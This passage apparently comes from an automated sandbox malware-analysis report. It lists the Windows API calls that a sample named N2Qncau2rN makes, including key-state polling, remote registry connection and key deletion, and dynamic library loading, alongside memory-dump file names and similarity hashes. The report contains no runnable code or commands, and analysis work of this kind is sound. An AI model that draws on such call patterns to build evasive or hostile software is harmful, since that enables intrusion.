  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
• GetFocus.USER32 ref: 0046157B
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
• GetClassNameW.USER32(?,?,00000100), ref: 004615C4
• EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
• __swprintf.LIBCMT ref: 00461608
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
• String ID: %s%d
• API String ID: 2645982514-1110647743
• Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
• Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
• Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
• Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
• Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
• Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
• Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
• Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
• Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
• Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
• Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
• Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
APIs
• GetCursorPos.USER32(?), ref: 004563A6
• ScreenToClient.USER32(?,?), ref: 004563C3
• GetAsyncKeyState.USER32(?), ref: 00456400
• GetAsyncKeyState.USER32(?), ref: 00456410
• GetWindowLongW.USER32(?,000000F0), ref: 00456466
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
• Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
• Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
• Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
• Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
• Sleep.KERNEL32(0000000A), ref: 0047D455
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID:
• API String ID: 327565842-0
• Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
• Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
• Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
• Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
• Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
• Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
• Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2095303065-0
                                                                                                                                                                                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RectWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 861336768-0
                                                                                                                                                                                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00449598
                                                                                                                                                                                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1856069659-0
                                                                                                                                                                                                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                                                                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(02E76380,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1300944170-0
                                                                                                                                                                                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
• Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
• Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
• Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
• Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(02E71A38,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(02E71A38,000000F1,00000001,00000000), ref: 00440E9A
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
